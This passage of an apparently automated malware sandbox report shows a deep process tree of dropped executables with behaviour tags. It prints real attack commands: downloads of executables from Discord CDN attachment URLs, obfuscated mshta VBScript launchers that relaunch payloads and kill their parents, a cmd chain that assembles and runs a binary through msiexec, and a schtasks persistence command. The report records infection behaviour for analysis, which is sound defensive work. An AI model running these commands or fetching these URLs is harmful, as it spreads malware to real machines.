                                                                                        • C:\Users\Admin\Pictures\Adobe Films\5uh0LAP86rJBL0FfaHwgmL2o.exe
                                                                                          "C:\Users\Admin\Pictures\Adobe Films\5uh0LAP86rJBL0FfaHwgmL2o.exe"
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4220
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\F875.tmp\F876.tmp\F877.bat "C:\Users\Admin\Pictures\Adobe Films\5uh0LAP86rJBL0FfaHwgmL2o.exe""
                                                                                            8⤵
                                                                                              PID:6492
                                                                                              • C:\Users\Admin\AppData\Local\Temp\F875.tmp\F876.tmp\extd.exe
                                                                                                C:\Users\Admin\AppData\Local\Temp\F875.tmp\F876.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
                                                                                                9⤵
                                                                                                  PID:6544
                                                                                                • C:\Users\Admin\AppData\Local\Temp\F875.tmp\F876.tmp\extd.exe
                                                                                                  C:\Users\Admin\AppData\Local\Temp\F875.tmp\F876.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/904754246044495955/904754480883597312/18.exe" "18.exe" "" "" "" "" "" ""
                                                                                                  9⤵
                                                                                                    PID:6584
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\F875.tmp\F876.tmp\extd.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\F875.tmp\F876.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/904754246044495955/904754503507652688/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""
                                                                                                    9⤵
                                                                                                      PID:2756
                                                                                                    • C:\Users\Admin\AppData\Local\Temp\6246\18.exe
                                                                                                      18.exe
                                                                                                      9⤵
                                                                                                        PID:2596
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\6246\Transmissibility.exe
                                                                                                        Transmissibility.exe
                                                                                                        9⤵
                                                                                                          PID:5164
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\F875.tmp\F876.tmp\extd.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\F875.tmp\F876.tmp\extd.exe "" "" "" "" "" "" "" "" ""
                                                                                                          9⤵
                                                                                                            PID:1048
                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\ZL3FUGMqSMk5HocPeZZTKjLR.exe
                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\ZL3FUGMqSMk5HocPeZZTKjLR.exe"
                                                                                                        7⤵
                                                                                                          PID:5300
                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\ZL3FUGMqSMk5HocPeZZTKjLR.exe
                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\ZL3FUGMqSMk5HocPeZZTKjLR.exe"
                                                                                                            8⤵
                                                                                                              PID:6836
                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\MLsH81O0rKTtYrx1eCnz4okR.exe
                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\MLsH81O0rKTtYrx1eCnz4okR.exe"
                                                                                                            7⤵
                                                                                                            • Checks BIOS information in registry
                                                                                                            • Checks whether UAC is enabled
                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                            PID:4480
                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\PsTGbp9bCOpjiXwTqC6tJa5s.exe
                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\PsTGbp9bCOpjiXwTqC6tJa5s.exe"
                                                                                                            7⤵
                                                                                                              PID:3996
                                                                                                              • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                                                                                                                "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
                                                                                                                8⤵
                                                                                                                  PID:6564
                                                                                                                • C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe
                                                                                                                  "C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"
                                                                                                                  8⤵
                                                                                                                  • Checks whether UAC is enabled
                                                                                                                  PID:6556
                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\Yd1tItXBggYu9MRrJVrGHkBL.exe
                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\Yd1tItXBggYu9MRrJVrGHkBL.exe"
                                                                                                                7⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Checks BIOS information in registry
                                                                                                                • Checks whether UAC is enabled
                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                PID:4196
                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\h8ExDlEiLqGIXdIfJqtnkVcL.exe
                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\h8ExDlEiLqGIXdIfJqtnkVcL.exe"
                                                                                                                7⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Checks BIOS information in registry
                                                                                                                • Checks whether UAC is enabled
                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                PID:3912
                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\EtTGsgByU8S9Eh8n2t4kfyyM.exe
                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\EtTGsgByU8S9Eh8n2t4kfyyM.exe"
                                                                                                                7⤵
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                • Suspicious behavior: MapViewOfSection
                                                                                                                PID:5248
                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\D4vz4E80fS5ijH9VCMkdQe7n.exe
                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\D4vz4E80fS5ijH9VCMkdQe7n.exe"
                                                                                                                7⤵
                                                                                                                  PID:1092
                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\RvWLQsK_laeQn8yFeO4VF3cE.exe
                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\RvWLQsK_laeQn8yFeO4VF3cE.exe"
                                                                                                                  7⤵
                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                  PID:5220
                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\RvWLQsK_laeQn8yFeO4VF3cE.exe
                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\RvWLQsK_laeQn8yFeO4VF3cE.exe"
                                                                                                                    8⤵
                                                                                                                      PID:4972
                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\2XCtPcrp5r2Xj8FmjmW5coK7.exe
                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\2XCtPcrp5r2Xj8FmjmW5coK7.exe"
                                                                                                                    7⤵
                                                                                                                      PID:880
                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\SVZL5Aa4160fyHj9k7O9I57a.exe
                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\SVZL5Aa4160fyHj9k7O9I57a.exe"
                                                                                                                      7⤵
                                                                                                                      • Checks SCSI registry key(s)
                                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                                      PID:3012
                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\xfU1tVU_XkSh7SYkF7vDazTm.exe
                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\xfU1tVU_XkSh7SYkF7vDazTm.exe"
                                                                                                                      7⤵
                                                                                                                        PID:6532
                                                                                                                        • C:\Windows\SysWOW64\WScript.exe
                                                                                                                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX2\demimondaines.vbs"
                                                                                                                          8⤵
                                                                                                                            PID:6488
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX2\adorning.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\RarSFX2\adorning.exe" -pgexttyzmupbgtedvwhlgstporlwudq
                                                                                                                              9⤵
                                                                                                                                PID:4352
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX3\lierne.exe
                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\RarSFX3\lierne.exe"
                                                                                                                                  10⤵
                                                                                                                                    PID:1724
                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
                                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                                                                                                                                      11⤵
                                                                                                                                        PID:2808
                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\RJ07IF6aOIlkBbEGYmC0Eknp.exe
                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\RJ07IF6aOIlkBbEGYmC0Eknp.exe"
                                                                                                                                7⤵
                                                                                                                                  PID:7040
                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\Slic_9pw1FVYJthSWdXDtyIz.exe
                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\Slic_9pw1FVYJthSWdXDtyIz.exe"
                                                                                                                                  7⤵
                                                                                                                                    PID:7060
                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\_0vEIvJjN10Zs8TEcsIZThcx.exe
                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\_0vEIvJjN10Zs8TEcsIZThcx.exe"
                                                                                                                                    7⤵
                                                                                                                                    • Checks BIOS information in registry
                                                                                                                                    • Checks whether UAC is enabled
                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                    PID:5956
                                                                                                                                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                                                      8⤵
                                                                                                                                        PID:2896
                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\k3sMKPJxPZRndw_Tdk42Es72.exe
                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\k3sMKPJxPZRndw_Tdk42Es72.exe"
                                                                                                                                      7⤵
                                                                                                                                        PID:6996
                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\k3sMKPJxPZRndw_Tdk42Es72.exe
                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\k3sMKPJxPZRndw_Tdk42Es72.exe"
                                                                                                                                          8⤵
                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                          PID:2348
                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\FjjK7OlxRh7yzxdmSxmUanr8.exe
                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\FjjK7OlxRh7yzxdmSxmUanr8.exe"
                                                                                                                                        7⤵
                                                                                                                                        • Loads dropped DLL
                                                                                                                                        PID:5668
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                          C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                          8⤵
                                                                                                                                          • Loads dropped DLL
                                                                                                                                          • Adds Run key to start application
                                                                                                                                          PID:5524
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"
                                                                                                                                            9⤵
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            PID:4392
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c Mon174a6c5f1664f.exe
                                                                                                                                    5⤵
                                                                                                                                      PID:2780
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS03B90BF5\Mon174a6c5f1664f.exe
                                                                                                                                        Mon174a6c5f1664f.exe
                                                                                                                                        6⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                        PID:2660
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS03B90BF5\Mon174a6c5f1664f.exe
                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7zS03B90BF5\Mon174a6c5f1664f.exe
                                                                                                                                          7⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:4308
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c Mon17a0d8ec302e.exe
                                                                                                                                      5⤵
                                                                                                                                        PID:3500
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS03B90BF5\Mon17a0d8ec302e.exe
                                                                                                                                          Mon17a0d8ec302e.exe
                                                                                                                                          6⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          PID:1772
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c Mon178d8e5d06822.exe
                                                                                                                                        5⤵
                                                                                                                                          PID:4052
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS03B90BF5\Mon178d8e5d06822.exe
                                                                                                                                            Mon178d8e5d06822.exe
                                                                                                                                            6⤵
                                                                                                                                              PID:1884
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                7⤵
                                                                                                                                                  PID:5096
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe
                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\DownFlSetup110.exe"
                                                                                                                                                    8⤵
                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                    PID:4472
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\6385619.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\6385619.exe"
                                                                                                                                                      9⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:5460
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\7297689.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\7297689.exe"
                                                                                                                                                      9⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                      PID:5700
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\6111211.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\6111211.exe"
                                                                                                                                                      9⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                                      • Checks whether UAC is enabled
                                                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                      PID:5872
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\7396100.exe
                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\7396100.exe"
                                                                                                                                                      9⤵
                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                      PID:6032
                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                        "C:\Windows\System32\mshta.exe" VBSCRIPt: cLOsE ( CrEATeoBjEcT ( "wsCrIpt.sHelL" ). RUn ("cmd /C copy /y ""C:\Users\Admin\AppData\Roaming\7396100.exe"" LYCw0J.ExE && stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF """" == """" for %T in ( ""C:\Users\Admin\AppData\Roaming\7396100.exe"") do taskkill /im ""%~nxT"" /f " , 0 , tRue ) )
                                                                                                                                                        10⤵
                                                                                                                                                          PID:5476
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /C copy /y "C:\Users\Admin\AppData\Roaming\7396100.exe" LYCw0J.ExE && stArT LYCw0J.exE /ptCSVoYGd9AYAP_3p6Sjuyj & iF "" == "" for %T in ( "C:\Users\Admin\AppData\Roaming\7396100.exe") do taskkill /im "%~nxT" /f
                                                                                                                                                            11⤵
                                                                                                                                                              PID:6096
                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                taskkill /im "7396100.exe" /f
                                                                                                                                                                12⤵
                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                PID:5272
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\2886257.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\2886257.exe"
                                                                                                                                                          9⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Suspicious behavior: SetClipboardViewer
                                                                                                                                                          PID:6064
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\1101862.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\1101862.exe"
                                                                                                                                                          9⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:1500
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\Soft1WW01.exe"
                                                                                                                                                        8⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:4328
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\chrome.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\chrome.exe"
                                                                                                                                                        8⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        PID:3176
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                                                          9⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:5708
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\chrome2.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
                                                                                                                                                        8⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                        PID:1940
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\inst1.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\inst1.exe"
                                                                                                                                                        8⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:1996
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"
                                                                                                                                                        8⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        PID:4956
                                                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                          "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                          9⤵
                                                                                                                                                            PID:4480
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_206.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                              10⤵
                                                                                                                                                                PID:1644
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                                                                                                                                                  ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                                                                                                                                                  11⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  PID:5292
                                                                                                                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                    "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                                    12⤵
                                                                                                                                                                      PID:5480
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                                        13⤵
                                                                                                                                                                          PID:5752
                                                                                                                                                                      • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                        "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                                                                                                                                        12⤵
                                                                                                                                                                          PID:5836
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                                                                                                                                            13⤵
                                                                                                                                                                              PID:5588
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                                                                                                                                14⤵
                                                                                                                                                                                  PID:5300
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                                                                                                                                                                  14⤵
                                                                                                                                                                                    PID:5972
                                                                                                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                    msiexec -Y ..\lXQ2g.WC
                                                                                                                                                                                    14⤵
                                                                                                                                                                                      PID:7084
                                                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                taskkill -f -iM "search_hyperfs_206.exe"
                                                                                                                                                                                11⤵
                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                PID:5808
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                                                                                                          8⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:2788
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2788 -s 792
                                                                                                                                                                            9⤵
                                                                                                                                                                            • Program crash
                                                                                                                                                                            PID:6072
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2788 -s 836
                                                                                                                                                                            9⤵
                                                                                                                                                                            • Program crash
                                                                                                                                                                            PID:5592
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2788 -s 800
                                                                                                                                                                            9⤵
                                                                                                                                                                            • Program crash
                                                                                                                                                                            PID:372
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2788 -s 804
                                                                                                                                                                            9⤵
                                                                                                                                                                            • Program crash
                                                                                                                                                                            PID:5568
                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2788 -s 928
                                                                                                                                                                            9⤵
                                                                                                                                                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                            • Program crash
                                                                                                                                                                            PID:5056
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\zhanglijuan-game.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\zhanglijuan-game.exe"
                                                                                                                                                                          8⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:4536
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"
                                                                                                                                                                          8⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                          PID:3624
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                                                            9⤵
                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                            PID:5636
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"
                                                                                                                                                                              10⤵
                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                              PID:1992
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\chrome3.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\chrome3.exe"
                                                                                                                                                                          8⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                          PID:4168
                                                                                                                                                                          • C:\Windows\system32\WerFault.exe
                                                                                                                                                                            C:\Windows\system32\WerFault.exe -u -p 4168 -s 1544
                                                                                                                                                                            9⤵
                                                                                                                                                                            • Program crash
                                                                                                                                                                            PID:5988
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Chrome5.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
                                                                                                                                                                          8⤵
                                                                                                                                                                            PID:4220
                                                                                                                                                                            • C:\Windows\System32\conhost.exe
                                                                                                                                                                              "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"
                                                                                                                                                                              9⤵
                                                                                                                                                                                PID:5104
                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                  "cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                  10⤵
                                                                                                                                                                                    PID:7620
                                                                                                                                                                                    • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                      schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                      11⤵
                                                                                                                                                                                      • Creates scheduled task(s)
                                                                                                                                                                                      PID:4184
                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                    "cmd" cmd /c "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                    10⤵
                                                                                                                                                                                      PID:8488
                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\services64.exe
                                                                                                                                                                                        11⤵
                                                                                                                                                                                          PID:5012
                                                                                                                                                                                          • C:\Windows\System32\conhost.exe
                                                                                                                                                                                            "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\services64.exe"
                                                                                                                                                                                            12⤵
                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                            PID:5932
                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                                                                                                                                                                                              13⤵
                                                                                                                                                                                                PID:7972
                                                                                                                                                                                                • C:\Windows\System32\conhost.exe
                                                                                                                                                                                                  "C:\Windows\System32\conhost.exe" "/sihost64"
                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                    PID:7464
                                                                                                                                                                                                • C:\Windows\explorer.exe
